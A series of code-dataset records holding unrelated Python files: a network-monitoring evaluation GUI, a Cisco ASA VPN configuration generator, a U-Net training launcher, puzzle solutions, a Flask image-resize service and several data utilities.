outputfile):\n\n #creating the gui envoirnment for widgets\n\n\n global windowevaluate\n windowevaluate = tk.Tk()\n # windowtwo.geometry('800x800+200+0')\n windowevaluate.title(\"Smark Network Monitoring Tool\")\n\n homecanvas = tk.Canvas(windowevaluate, width=800, height=800)\n homecanvas.pack()\n\n headinglabel = Label(homecanvas, text=\"Smart Network Monitoring Tool\", fg='#0b0230', font=('helvetica', 25, 'bold'))\n homecanvas.create_window(400, 100, window=headinglabel)\n\n\n\n #creating the top part to get the attacker ip\n\n attackersiplabel = Label(homecanvas, text=\"Enter the Attackers IP for evaluation\", fg='black', font=('helvetica', 15, 'bold'))\n homecanvas.create_window(400, 170, window=attackersiplabel)\n\n inputboxip = tk.Entry(windowevaluate)\n homecanvas.create_window(300, 210, window=inputboxip)\n\n global startscanafteriprecievedbtn\n startscanafteriprecievedbtn = tk.Button(text='Start Scanning', command=lambda: gotostartevaluatingthread(inputboxip.get(), inputfile, outputfile), bg='light blue', fg='black', font=('helvetica', 12, 'bold'))\n homecanvas.create_window(500, 210, window=startscanafteriprecievedbtn)\n\n\n global quitevaluatebtn\n quitevaluatebtn = tk.Button(text='Quit Evaluate',\n command= quitandopenhomewindow,\n bg='red', fg='black', font=('helvetica', 12, 'bold'))\n homecanvas.create_window(400, 700, window=quitevaluatebtn)\n\n quitevaluatebtn[\"state\"] = \"disabled\"\n\n\n treeviewframe = LabelFrame(windowevaluate, text=\"Excel Data\")\n treeviewframe.place(height=330, width=400, rely=0.35, relx=0.25)\n\n global tv1\n tv1 = ttk.Treeview(treeviewframe)\n tv1.place(relheight=1, relwidth=1) # set the height and width of the widget to 100% o its container (frame1).\n\n # treescrolly = tk.Scrollbar(treeviewframe, orient=\"vertical\",\n # command=tv1.yview) # command means update the yaxis view of the widget\n # treescrollx = tk.Scrollbar(treeviewframe, orient=\"horizontal\",\n # command=tv1.xview) # command means update the xaxis view of the widget\n # tv1.configure(xscrollcommand=treescrollx.set,\n # yscrollcommand=treescrolly.set) # assign the scrollbars to the Treeview Widget\n # treescrollx.pack(side=\"bottom\", fill=\"x\") # make the scrollbar fill the x axis of the Treeview widget\n # treescrolly.pack(side=\"right\", fill=\"y\") # make the scrollbar fill the y axis of the Treeview widget\n\n listofcolumns = [\"Measure\", \"Measure Value\"]\n\n # tv1[\"column\"] = listofcolumns\n # tv1[\"show\"] = \"headings\"\n # tv1.heading(\"Measure\", text=\"Measure\")\n # tv1.heading(\"Measure Value\", text=\"Measure Value\")\n\n tv1[\"columns\"] = (\"one\")\n # tv1[\"show\"] = \"headings\"\n tv1.column('#0')\n tv1.column(\"one\", width=150)\n\n tv1.heading('#0', text=\"Measures\")\n tv1.heading(\"one\", text=\"Values\")\n\n tv1.insert(parent=\"\", index=\"end\", iid=0, text='Total Flows', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=1, text='Total Positive Flows', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=2, text='Total Negative Flows', values=(\"0\"))\n\n tv1.insert(parent=\"\", index=\"end\", iid=3, text='True Positives', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=4, text='True Negatives', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=5, text='False Positives', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=6, text='False Negatives', values=(\"0\"))\n\n tv1.insert(parent=\"\", index=\"end\", iid=7, text='Average Accuracy', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=8, text='Positive Class Accuracy', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=9, text='Negative Class Accuracy', values=(\"0\"))\n\n tv1.insert(parent=\"\", index=\"end\", iid=10, text='Positive Class Precision', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=11, text='Negative Class Precision', values=(\"0\"))\n\n tv1.insert(parent=\"\", index=\"end\", iid=12, text='Positive Class Recall', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=13, text='Negative Class Recall', values=(\"0\"))\n\n windowevaluate.mainloop()\n\n#createwindowevaluation(r'D:\\Dropbox\\Dropbox\\P1 Research\\Pyhton Codes\\Test data and models\\2020-03-15_Flow.csv', r'D:\\Dropbox\\Dropbox\\P1 Research\\Pyhton Codes\\Test data and models')","repo_name":"adamisrail/FYP","sub_path":"WindowEvalWithTreeView.py","file_name":"WindowEvalWithTreeView.py","file_ext":"py","file_size_in_byte":11049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"38548825893","text":"#!/usr/bin/env python3\n# Import OS module to do things like execute commands directly to OS\nimport os\n# Load built-in or APT installed modules\nimport socket\nimport sys\nimport getpass\nimport pip\n# Load netmiko module, to do the magic happens\nfrom netmiko import ConnectHandler\n\nprint(\"L2L configuration generator\")\nprint(\" \")\nprint(\"Checking if we need install any modules before run. Please wait...\")\nprint(\" \")\n\n\n# Install core modules to run\nprint(\"We will need install some python packages/modules, if this is your \"\n \"first run\")\nprint('ensure your internet connection is working and be patient...')\n# Install packages via APT\nprint('Veryifing module install via APT')\nos.system(\"/usr/bin/apt-get install -y python3 python3-pip python3-paramiko\")\n\n\n# Confirm if we have all python3 modules needed to run this\n# If modules are not found, install them via pip\npkgs = ['pprint', 'pyyaml', 'pyserial', 'textfsm', 'netmiko']\nfor package in pkgs:\n try:\n import package\n except ImportError:\n pip.main(['install', package])\n\n\nos.system(\"clear\")\nprint(\"Welcome to Tabajara L2L configuration generator\")\nprint(\" \")\n# Just a greeting to user\nprint(\"Now we are (hopefuly) with all set to start \")\n\n\n# Reads the user input to determine which type of configuration we need\n# If the ASA is 8.2 or earlier we use isakmp crypto, otherwise we user ike\nprint(\" \")\nprint(\"For which version os IOS we are building this config?\")\nprint(\"The ASA its running 8.2 or earlier?\")\nprint(\" \")\nasaversion = input(\"Please enter 8.2 to any version below 8.3 or 8.3 for any\"\n \" other version: \")\n# Ask the user for SSH port, is none is informed, use the default (22)\nprint(\" \")\nremoteport = int(input(\"Please inform the SSH port to connect to ASA. Just \"\n \"press enter if using the default port (22): \") or 22)\n\n# Different actions for different versions\nif asaversion == '8.2':\n print(\" \")\n print(\"ASA version 8.2 or earlier, generating \"\n \"configuration in ISAKMP mode\")\n print(\"------------------------\"\n \"-------------------------------------------\")\n hostname = input(\"Please inform the IP or hostname to connect: \")\n ssh_username = input(\"Please inform the username to be used to connect \"\n \"(make sure the user has privilege 15): \")\n ssh_password = getpass.getpass(\"Please inform the password to be used\"\n \" to connect: \")\n enable_secret = getpass.getpass(\"ASA in version 8.2 and below uses enable\"\n \" secret, please inform them now: \")\n print(\"-------------------------------------------------------------\"\n \"-----------\")\nelif asaversion == '8.3':\n print(\" \")\n print(\"ASA version 8.3 or superior, generating configuration in IKE mode\")\n print(\"-----------------------------------------------------------------\")\n hostname = input(\"Please inform the IP or hostname to connect: \")\n ssh_username = input(\"Please inform the username to be used to connect\"\n \" (make sure the user has privilege 15): \")\n ssh_password = getpass.getpass(\"Please inform the password to be used to\"\n \" connect and enable: \")\n # We dont really need this here, but netmiko refuses to work if dont get\n # enable superpowers, so, lets use the same variable for enable_secret\n enable_secret = ssh_password\n print(\"------------------------------------------------------------\")\nelse:\n print(\" \")\n print(\"Invalid input, program will exit now\")\n sys.exit()\n\n\n# Lets confirm the port is opened before do anything further\ndef isOpen(ip, port):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print('Verifying if host is listening on remote port '\n + str(remoteport) + ' ...')\n s.connect((ip, port))\n s.shutdown(2)\n print(\" \")\n print('Host is listening on remote port ' + str(remoteport) +\n '... proceeding')\n print(\" \")\n except socket.error:\n print(\" \")\n print('Host its not listening on indicated remote port '\n + str(remoteport) + ', program will exit now')\n sys.exit()\n\n\n# Execute the function to check if host is listening on indicated port\nisOpen(hostname, remoteport)\n\n\n# Lets define a ASA here, to be used be netmiko after\nasa_firewall = {\n 'device_type': 'cisco_asa',\n 'ip': hostname,\n 'username': ssh_username,\n 'password': ssh_password,\n 'port': remoteport,\n 'secret': enable_secret,\n 'verbose': False, # optional, defaults to False\n}\n\n\n# Connect to ASA using SSH, and stores the version of the box to be compared\n# We need this to ensure we will not break anything to user\ndef check_asaversion():\n client = ConnectHandler(**asa_firewall)\n # Stores entire 'show version' output into variable showversion\n showversion = client.send_command('show version')\n # Split the showversion variable to get only the major version/release\n showversion_split = str(showversion.split('\\n')[1]\n .split(' ')[-2].split('(')[0])\n return showversion_split\n\n\n# Lets put the ASA version here to compare in next section\nversion_running = check_asaversion()\n\n\n# Compare the user input with the version we got from device\nif version_running <= '8.2':\n if version_running <= '8.2':\n print(\" \")\n print(\"You informed version \" + asaversion +\n \" when program started...\")\n print(\"Informed version \" + asaversion + \" and device version \"\n + version_running + \" are compatible, proceeding...\")\n else:\n print(\"You informed version \" + asaversion +\n \" when program started...\")\n print(\"Informed version \" + asaversion + \" and device version \"\n + version_running + \" are not compatible to configure\")\n print(\"Please check your input and try again\")\n print(\"Exiting now...\")\n sys.exit()\nelif version_running >= '8.3':\n if version_running >= '8.3':\n print(\"You informed version \" + asaversion +\n \" when program started...\")\n print(\"Informed version \" + asaversion + \" and device version \"\n + version_running + \" are compatible, proceeding...\")\n else:\n print(\"You informed version \" + asaversion +\n \" when program started...\")\n print(\"Informed version \" + asaversion + \" and device version \"\n + version_running + \" are not compatible to configure\")\n print(\"Please check your input and try again\")\n print(\"Exiting now...\")\n sys.exit()\n\n# Lets start to collect information from the user, to build the configuration\n# to be applied into ASA further\ncompany01 = input(\"Enter abbreviated name of the company of this firewall: \")\ncompany02 = input(\"Enter abbreviated name of partner company where the \"\n \"connection will be made: \")\nprint(\"object-group network \" + company01 + \"-\" + company02,\n file=open(\"/tmp/temp_network-companies.txt\", \"w\"))\nprint(\"description Hosts/Networks to protect in \" + company01 + \" side\",\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\nprint(\" \")\nprint(\"Please inform the hosts/networks to be added to VPN in \" + company01)\nprint(\"side, to specify hosts enter 255.255.255.255 as mask\")\nprint(\" \")\nprint(\"example: 192.168.1.234 255.255.255.255 for a host or\")\nprint(\"example: 192.168.1.0 255.255.255.0 for the entire\")\nprint(\"192.168.1 network\")\nprint(\" \")\nprint(\"Press Ctrl-D to save it.\")\nprotect_company01 = []\nwhile True:\n try:\n line = input()\n linecomplete = \"network-object {}\".format(line)\n protect_company01.append(linecomplete)\n except EOFError:\n break\n\narquivo = open('/tmp/temp_network-companies.txt', 'a')\nfor item in protect_company01:\n arquivo.write(\"%s\\n\" % item)\n\nprint(\"object-group network \" + company02 + \"-\" + company01,\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\nprint(\"description Hosts/Networks to protect in \" + company02 + \" side\",\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\nprint(\" \")\nprint(\"Please inform the hosts/networks to be added to VPN in \" + company02)\nprint(\"side, to specify hosts enter 255.255.255.255 as mask\")\nprint(\" \")\nprint(\"example: 192.168.1.234 255.255.255.255 for a host or\")\nprint(\"example: 192.168.1.0 255.255.255.0 for the entire\")\nprint(\"192.168.1 network\")\nprint(\" \")\nprint(\"Press Ctrl-D to save it.\")\nprotect_company02 = []\nwhile True:\n try:\n line = input()\n linecomplete = \"network-object {}\".format(line)\n protect_company02.append(linecomplete)\n except EOFError:\n break\n\narquivo = open('/tmp/temp_network-companies.txt', 'a')\nfor item in protect_company02:\n arquivo.write(\"%s\\n\" % item)\n\n# Lets build the default ACLs\nprint(\"access-list \" + company01 + \"-\" + company02 + \"extended permit ip \"\n \"any object-group \" + company01 + \"-\" + company02,\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\n\nprint(\"access-list \" + company01 + \"-\" + company02 + \"extended permit ip \"\n \"object-group \" + company01 + \"-\" + company02 + \"any\",\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\n\nprint(\"access-list \" + company01 + \"-\" + company02 + \"extended permit ip any4\"\n \" object-group \" + company01 + \"-\" + company02,\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\n\nprint(\"access-list \" + company01 + \"-\" + company02 + \"extended permit ip\"\n \" object-group \" + company01 + \"-\" + company02 + \"any4\",\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\n\n'''access-list B2BSSIT-RABK extended permit ip any4 object-group B2BSSIT-RABK\naccess-list B2BSSIT-RABK extended permit ip object-group B2BSSIT-RABK any4\n\n# Define default variables for security association parameters\nlifetime_seconds = 28800\nlifetime_kilobytes = 4608000\n\n# Define dictionaries to read actual configuration and determine the\n# index of the new configuration\ncrypto_map_properties = { 'index': ' ', 'parameter': ' ',\n'property': ' ', 'value': '' }\ncrypto_policy = { 'index': ' ', 'authentication': ' ', 'encryption': ' ',\n'hash': ' ', 'group': ' ', 'lifetime': '' }\ngroup_policy = { 'name': ' ', 'protocol': ' ', 'peer_ip': '' }\ntunnel_group = { 'peer_ip': ' ', 'group_policy': ' ', 'psk': '' }\n\n# Start to fill the new configuration\ndef cypto-policy-conf {print 'crypto isakmp policy crypto_policy.index()','''\n","repo_name":"vakaobr/l2lvpngen","sub_path":"l2lvpngen.py","file_name":"l2lvpngen.py","file_ext":"py","file_size_in_byte":10474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"22018022699","text":"# coding: utf-8\n\nimport yaml\nfrom main import *\nfrom dataprovider import *\nfrom make_tfrecords import *\nimport arg_parse\n\n\ndef cfg_parse(args, cfg):\n args_dict = args.__dict__\n args_key_list = [key for key in args_dict]\n cfg_key_list = [key for key in cfg]\n\n # init None args with cfg values\n undefined_arg_key = filter(lambda x, args_dict=args_dict: args_dict[x] is None, args_key_list)\n undefined_arg_key = filter(lambda x: x in cfg_key_list, undefined_arg_key)\n for key_name in undefined_arg_key:\n args_dict[key_name] = cfg[key_name]\n\n # add args which are not included in args parser\n uncontained_arg_key = filter(lambda x: not (x in args_key_list), cfg_key_list)\n for key_name in uncontained_arg_key:\n args_dict[key_name] = cfg[key_name]\n\n return args\n\n\ndef main():\n args = arg_parse.get_arg()\n with open(args.cfg, 'r') as f:\n cfg = yaml.load(f)\n f.close()\n args = cfg_parse(args, cfg)\n if args.loss == 'cross_entropy_log_dice':\n loss_kwargs = {'alpha': args.alpha}\n else:\n loss_kwargs = {}\n\n data = [args.dataset1, args.dataset2, args.dataset3, args.dataset4]\n test_num = args.testset\n testset = data[test_num - 1]\n trainset = []\n for i in range(4):\n if i != test_num - 1:\n trainset += data[i]\n tfrecord_train = TFrecord_Create_For_Unet(train_test='train',\n dataset=trainset,\n img_folder=args.img_dir,\n label_names=args.label_names,\n img_type=args.img_type,\n tf_record_pre_fix=args.tf_record_prefix,\n nx=args.img_size[0],\n ny=args.img_size[1]\n )\n\n tfrecord_test = TFrecord_Create_For_Unet(train_test='test',\n dataset=testset,\n img_folder=args.img_dir,\n img_type=args.img_type,\n label_names=args.label_names,\n tf_record_pre_fix=args.tf_record_prefix,\n nx=args.img_size[0],\n ny=args.img_size[1]\n )\n train_size = tfrecord_train.image_count\n test_size = tfrecord_test.image_count\n training_iters = int(math.ceil(train_size / args.batch_size))\n\n # Set up Dataprovider\n data_provider = Tfrecord_ImageDataProvider(\n train_tfrecord_path=args.train_tfrecord_path,\n test_tfrecord_path=args.test_tfrecord_path,\n channels=args.channels, train_batch_size=args.batch_size, test_batch_size=1,\n nx=args.img_size[0], ny=args.img_size[1])\n\n # Training\n net = Network(net_type=args.net_type, loss=args.loss, layers=5, features_root=64, channels=args.channels,\n loss_kwargs=loss_kwargs)\n trainer = Trainer(net, data_provider=data_provider, batch_size=args.batch_size, validation_batch_size=1,\n optimizer=args.opt, lr=args.lr, nx=args.img_size[0], ny=args.img_size[1], opt_kwargs={})\n trainer.train(output_path=args.model_path, log_path=args.log_path, prediction_path=args.pred_path,\n training_iters=training_iters, epochs=args.n_epochs, test_size=test_size)\n _d, _i = trainer.test(model_path=args.model_path, data_provider=data_provider, test_size=test_size)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"troylujc/AttentionUnet","sub_path":"launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"60"} +{"seq_id":"43224078338","text":"class Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n m, n = len(matrix), len(matrix[0])\n left, right = 0, (m*n)-1\n while left <= right:\n pivot = left + ((right-left)//2)\n mid = matrix[pivot//n][pivot%n]\n if target == mid:\n return True\n if target < mid:\n right = pivot - 1\n else:\n left = pivot + 1\n return False","repo_name":"thegeorgejoseph/hash-define-dsa","sub_path":"74-search-a-2d-matrix/74-search-a-2d-matrix.py","file_name":"74-search-a-2d-matrix.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74519343229","text":"from __future__ import annotations\nimport argparse\nfrom collections import Counter\nfrom pathlib import Path\nfrom typing import Optional, Union\n\nimport pytest\nfrom support import timing\n\nINPUT_TXT = Path(__file__).parent.joinpath(\"input.txt\")\n\n\ndef get_bracket_score(bracket: str) -> int:\n bracket_map = {\")\": 3, \"]\": 57, \"}\": 1197, \">\": 25137}\n return bracket_map.get(bracket)\n\n\ndef compute(s: Union[list[str], str], testing: Optional[bool] = None) -> int:\n lines = s if testing and type(s) == list[str] else s.splitlines()\n counter = Counter({\")\": 0, \"]\": 0, \"}\": 0, \">\": 0})\n forward_brackets = {\"(\": \")\", \"[\": \"]\", \"{\": \"}\", \"<\": \">\"}\n reversed_brackets = {v: k for k, v in forward_brackets.items()}\n\n for line in lines:\n bracket_stack = []\n for c in line:\n if c in forward_brackets:\n bracket_stack.append(c)\n elif c in reversed_brackets:\n if reversed_brackets[c] == bracket_stack[-1]:\n bracket_stack.pop()\n else:\n counter[c] += 1\n break\n\n return sum(v * get_bracket_score(k) for k, v in counter.items())\n\n\ndef test(input_data) -> None:\n assert compute(input_data, testing=True) == 26397\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"data_file\", nargs=\"?\", default=INPUT_TXT)\n args = parser.parse_args()\n with open(args.data_file) as f, timing():\n print(compute(f.read()))\n\n return 0\n\n\nif __name__ == \"__main__\":\n raise SystemExit(main())\n","repo_name":"cardonas/AdventOfCode","sub_path":"aoc2021/day10/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"26300298257","text":"from subprocess import call\nfrom sys import exit\nfrom platform import python_version, architecture\n\n\nclass system_check:\n def __init__() -> None:\n minimum_python_version = \"3.7.3\"\n minimum_distro_version = \"buster\"\n\n def apt_system_checks():\n call([\"sudo\", \"apt\", \"update\"])\n call([\"sudo\", \"apt\", \"upgrade\", \"-y\"])\n\n def rasp_os_ver():\n os_file = \"/etc/os-release\"\n with open(os_file, 'r') as f:\n data = f.read()\n data = data.splitlines()[4].split(\"=\")[1]\n if data != system_check.minimum_distro_version:\n f.close()\n exit(\"Unsupported Distro\")\n f.close()\n return True\n\n def platform_check():\n plat = architecture()\n if plat[0] != \"32bit\":\n exit(\"Invalid Arch\")\n return plat[0]\n\n def get_python_version():\n python_version = python_version()\n if system_check.python_version < system_check.minimum_python_version:\n exit(\"Your Python Version is too low\")\n return system_check.python_version\n\n def install_required_pip_packages():\n call([\"pip\", \"install\", \"--upgrade\" \"pip\",\n \"systemtools\", \"disttools\", \"wheel\"])\n with open('/home/pi/menu_project/requirements.txt', 'r') as f:\n for line in f:\n data = line.strip(\"\\n\").split()[0]\n call([\"pip\", \"install\", data])\n f.close()\n exit(0)\n","repo_name":"rocksinboxes/menu_project","sub_path":"system_checks.py","file_name":"system_checks.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40815325909","text":"\"\"\"add assertion type for strict and warning checks. Strict is pass/fail, warning is for less important discrepancies\n\nRevision ID: b8670422db69\nRevises: c6e76ab376a8\nCreate Date: 2022-05-12 10:09:10.997732\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nfrom sqlalchemy import orm\nfrom sqlalchemy.dialects import postgresql\n\nfrom application.models import AssertionType\n\nrevision = \"b8670422db69\"\ndown_revision = \"c6e76ab376a8\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n assertion_type = postgresql.ENUM(AssertionType, name=\"assertion_type\")\n assertion_type.create(op.get_bind(), checkfirst=True)\n op.add_column(\n \"assertion\",\n sa.Column(\n \"assertion_type\", sa.Enum(\"strict\", \"warning\", name=\"assertion_type\")\n ),\n )\n op.execute(\"UPDATE assertion SET assertion_type = 'strict'\")\n op.alter_column(\"assertion\", \"assertion_type\", nullable=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"assertion\", \"assertion_type\")\n # ### end Alembic commands ###\n","repo_name":"digital-land/performance-prototype","sub_path":"migrations/versions/b8670422db69_add_assertion_type_for_strict_and_.py","file_name":"b8670422db69_add_assertion_type_for_strict_and_.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17309242420","text":"import os\nimport subprocess\nimport requests\nfrom flask import Flask, request, send_file\nimport uuid\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = '/tmp/images'\n\n\n@app.route('/resize', methods=['POST'])\ndef resize():\n if not os.path.exists(app.config['UPLOAD_FOLDER']):\n os.makedirs(app.config['UPLOAD_FOLDER'])\n file = request.files['file']\n size = request.values['size']\n if file:\n extension = os.path.splitext(file.filename)[1]\n path = os.path.join(app.config['UPLOAD_FOLDER'], str(uuid.uuid4()))\n file.save(path + extension)\n resized = resizeCmd(path, extension, size)\n return send_file(resized)\n\n@app.route('/resize/percent', methods=['POST'])\ndef resizePercent():\n if not os.path.exists(app.config['UPLOAD_FOLDER']):\n os.makedirs(app.config['UPLOAD_FOLDER'])\n file = request.files['file']\n percent = request.values['percent']\n if file:\n extension = os.path.splitext(file.filename)[1]\n path = os.path.join(app.config['UPLOAD_FOLDER'], str(uuid.uuid4()))\n file.save(path + extension)\n url = 'http://exifdata:8082/exifdata/filtered'\n files = {'file': open(path+extension, 'rb')}\n\n r = requests.post(url, files=files, data={'filter': 'Image Height'})\n\n percentSize = float(str(r.text).split(':')[1].strip()) * (float(percent) / 100)\n\n resized = resizeCmd(path, extension, str(percentSize)+'x'+str(percentSize))\n return send_file(resized, mimetype=\"image/*\")\n\n\n\ndef resizeCmd(path, extension, size):\n newFileName = path + \"_resized\" + extension\n subprocess.call(('convert', path + extension,\"-resize\", size, newFileName))\n return newFileName;\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"thomasiffland/master-project-python","sub_path":"resize/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32101662549","text":"class Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n ret = dict()\n\n # use key as a sorted chars\n # use value as a element of strs array\n for item in strs:\n words = [c for c in item]\n words.sort()\n words = tuple(words)\n\n if words not in ret:\n ret[words] = []\n ret[words].append(item)\n\n ans = []\n for key in ret.keys():\n ans.append(ret[key])\n return ans","repo_name":"LONGNEW/Problem_Solving","sub_path":"leetcode/49. Group Anagrams.py","file_name":"49. Group Anagrams.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31854166480","text":"import os, numpy\nfrom optparse import OptionParser\n\nfrom flydra_db import FlydraDB\nfrom geometric_saccade_detector.io import saccades_read_mat\n\nfrom .constants import SACCADES_TABLE\n\ndescription = \"Imports the saccade data from Andrea's Matlab files to FlydraDB.\"\n \ndef main():\n parser = OptionParser(usage=description)\n parser.add_option(\"--saccade_data\", help=\"Main data directory\",\n default='saccade_data')\n parser.add_option(\"--db\", help=\"FlydraDB directory\")\n \n parser.add_option(\"--verbose\", help='Verbose output',\n default=False, action=\"store_true\")\n \n (options, args) = parser.parse_args() #@UnusedVariable\n \n if not options.db:\n raise Exception('Please define FlydraDB directory using `--db`.')\n \n def printv(s):\n if options.verbose:\n print(s)\n \n flydra_db = FlydraDB(options.db, create=True)\n \n matlab_dir = options.saccade_data\n for group in os.listdir(matlab_dir):\n group_dir = os.path.join(matlab_dir, group)\n if not os.path.isdir(group_dir): \n continue\n \n printv(\"Opening {0}\".format(group))\n \n# \n# \n# exp_data, attributes = read_raw_data(filename)\n# \n# consider_importing_processed(flydra_db, sample, exp_data, attributes)\n# \n# flydra_db.set_attr(sample, 'species', attributes['species'])\n# flydra_db.set_attr(sample, 'background', attributes['background'])\n# \n# flydra_db.set_table(sample, EXP_DATA_TABLE, exp_data)\n# flydra_db.add_sample_to_group(sample, group)\n# flydra_db.add_sample_to_group(sample, 'ros')\n# \n \n processed_dir = os.path.join(group_dir, 'processed')\n \n if not os.path.exists(processed_dir):\n printv(\"No processed data found for group %r.\" % group)\n continue\n \n for conf in os.listdir(processed_dir):\n # first look for saccades.mat\n saccades_file = os.path.join(processed_dir, conf, 'saccades.mat')\n if os.path.exists(saccades_file):\n printv('Loading from file %r.' % saccades_file)\n saccades = saccades_read_mat(saccades_file)\n samples = numpy.unique(saccades['sample'])\n for sample in samples:\n if not flydra_db.has_sample(sample):\n flydra_db.add_sample(sample)\n flydra_db.add_sample_to_group(sample, group)\n sample_saccades = saccades[saccades[:]['sample'] == sample]\n flydra_db.set_table(sample=sample, table=SACCADES_TABLE,\n version=conf, data=sample_saccades)\n# else:\n# prefix = 'data_'\n# suffix = '.mat'\n# for file in [file for file in os.listdir(group_dir) \n# if (file.startswith(prefix)) and file.endswith(suffix)]:\n# \n# sample = file[len(prefix):file.index('.')]\n# \n# if verbose:\n# print(\" - Considering sample {0}\".format(sample.__repr__()))\n# \n# if not flydra_db.has_sample(sample):\n# flydra_db.add_sample(sample)\n# \n# filename = os.path.join(group_dir, file)\n# \n# \n# \n# else:\n# for conf in os.listdir(processed_dir): \n# saccades = os.path.join(processed_dir, conf, 'saccades.mat')\n# if os.path.exists(saccades): \n# group_record.configurations[conf] = saccades\n# # add to general list\n# self.configurations.add(conf)\n## else:\n## conf_dir = os.path.join(processed_dir, conf)\n## for file in [file for file in os.listdir(conf_dir) \n## if file.startswith('processed_data_') and file.endswith('.mat')]: \n## id = file[5:-7]\n#\n# # if we don't have exp data, get list of samples from\n# # processed data\n# if group_record.configurations and \\\n# not group_record.has_experimental_data:\n# saccades = saccades_read_mat(saccades)\n# group_record.samples = set(numpy.unique(saccades['sample']))\n# for sample in group_record.samples:\n# self.sample2group[sample] = group\n#\n# if len(group_record.samples)> 0:\n# self.groups[group] = group_record\n# \n# print \"has it\", group, group_record.has_experimental_data\n# \n flydra_db.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AndreaCensi/saccade_analysis","sub_path":"src-python/saccade_analysis/import_matlab_andrea.py","file_name":"import_matlab_andrea.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"73479354430","text":"from .Simple import Simple\nfrom .. import helper\n\n\nclass SimpleWithInfo(Simple):\n def decode_object(self, src_dir, file_name, dest_dir, dest_path, version, header_data):\n super(Simple, self).decode_object(src_dir, file_name, dest_dir, dest_path, version, header_data)\n try:\n self.header['info'] = helper.brace_file_read(src_dir, f'{self.header[\"uuid\"]}.0')\n except FileNotFoundError:\n return\n\n def write_encode_object(self, dest_dir):\n super(Simple, self).write_encode_object(dest_dir)\n info = self.header.get('info')\n if info:\n file_name = f'{self.header[\"uuid\"]}.0'\n helper.brace_file_write(info, dest_dir, file_name)\n self.file_list.append(file_name)\n","repo_name":"saby-integration/v8unpack","sub_path":"src/v8unpack/MetaDataObject/core/SimpleWithInfo.py","file_name":"SimpleWithInfo.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"659896134","text":"import requests\nimport bs4\n\nbark_key = \"HaNJZPZJyMpSoNp2QLnrM8\"\n\ndef get_tag_notice():\n url = 'https://note.boccc.co/'\n r = requests.get(url)\n soup = bs4.BeautifulSoup(r.text, 'html.parser')\n contents = soup.find('div', id='posts-wrapper')\n contents = contents.find_all('div', class_='post')\n return contents\n\n\ndef handle_tag_notice(contents):\n tag_notices = []\n for content in contents:\n tag_notice = {}\n notice_type = content.find('h1', class_='entry-title').text.replace('#', '')\n #

033月 / 2023

